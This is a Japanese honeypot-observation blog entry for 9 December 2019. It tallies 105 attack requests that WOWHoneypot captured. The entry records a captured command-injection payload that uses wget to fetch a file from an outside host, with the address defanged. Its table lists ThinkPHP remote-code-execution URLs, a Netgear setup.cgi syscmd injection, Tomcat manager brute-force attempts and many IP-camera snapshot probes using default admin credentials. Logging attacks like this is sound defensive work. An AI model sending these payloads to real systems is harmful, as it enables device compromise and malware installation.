23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(268日目)

2019/12/09(月)

トータルは105件でした。

ハンティングログは以下です。

167.249.245[.]44 wget${IFS}-qO-${IFS}hxxp[:]//205.185.115[.]72/b

www.virustotal.com

件数 概要 リクエス
33 アクセス GET /
4 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
2 DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 POST /editBlackAndWhiteList
2 IPカメラの調査 GET /webcapture.jpg?command=snap&channel=1?COUNTER
2 IPカメラの調査 GET /videostream.cgi?user=admin&pwd=
2 IPカメラの調査 GET /video/mjpg.cgi
2 IPカメラの調査 GET /snap.jpg?JpegSize=M&JpegCam=1&r=COUNTER
2 IPカメラの調査 GET /shot.jpg?rnd=654321
2 IPカメラの調査 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/¤tsetting.htm=1
2 IPカメラの調査 GET /out.jpg?q=30&id=0.1317044913727916&r=COUNTER
2 IPカメラの調査 GET /oneshotimage1?COUNTER
2 IPカメラの調査 GET /mjpg/video.mjpg
2 IPカメラの調査 GET /mjpeg.cgi
2 IPカメラの調査 GET /manager/text/list
2 IPカメラの調査 GET /live.jpg?&&&COUNTER
2 IPカメラの調査 GET /jpg/image.jpg?COUNTER
2 IPカメラの調査 GET /img/video.mjpeg
2 IPカメラの調査 GET /image?speed=0
2 IPカメラの調査 GET /cgi-bin/viewer/video.jpg?r=COUNTER
2 IPカメラの調査 GET /cgi-bin/snapshot.cgi?chn=3&u=admin&p=&q=0&COUNTER
2 IPカメラの調査 GET /cgi-bin/snapshot.cgi?chn=2&u=admin&p=&q=0&COUNTER
2 IPカメラの調査 GET /cgi-bin/snapshot.cgi?chn=1&u=admin&p=&q=0&COUNTER
2 IPカメラの調査 GET /cgi-bin/snapshot.cgi?chn=0&u=admin&p=&q=0&COUNTER
2 IPカメラの調査 GET /cgi-bin/faststream.jpg?stream=half&fps=15&rand=COUNTER
2 IPカメラの調査 GET /cgi-bin/camera?resolution=640&quality=1&Language=0&COUNTER
2 IPカメラの調査 GET /cam_1.cgi
2 IPカメラの調査 GET /axis-cgi/mjpg/video.cgi?camera=&resolution=640x480
2 IPカメラの調査 GET /SnapshotJPEG?Resolution=640x480&Quality=Clarity&COUNTER
2 IPカメラの調査 GET /GetData.cgi?CH=1
2 IPカメラの調査 GET /?action=stream
2 IPカメラの調査 GET /-wvhttp-01-/GetOneShot?image_size=640x480&frame_count=1000000000
1 不正中継の調査 HEAD hxxp[:]//123.125.114.144/
1 不明 HEAD /esps/
1 クローリング GET /robots.txt
1 不明 GET /dd/
1 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
1 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
1 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
1 管理者設定の調査 GET //admin/config.php?password%5B0%5D=bebydviyx&username=admin
1 管理者設定の調査 GET //admin/config.php?password%5B0%5D=ZIZO&username=admin
1 不正中継の試み CONNECT www.google.com:443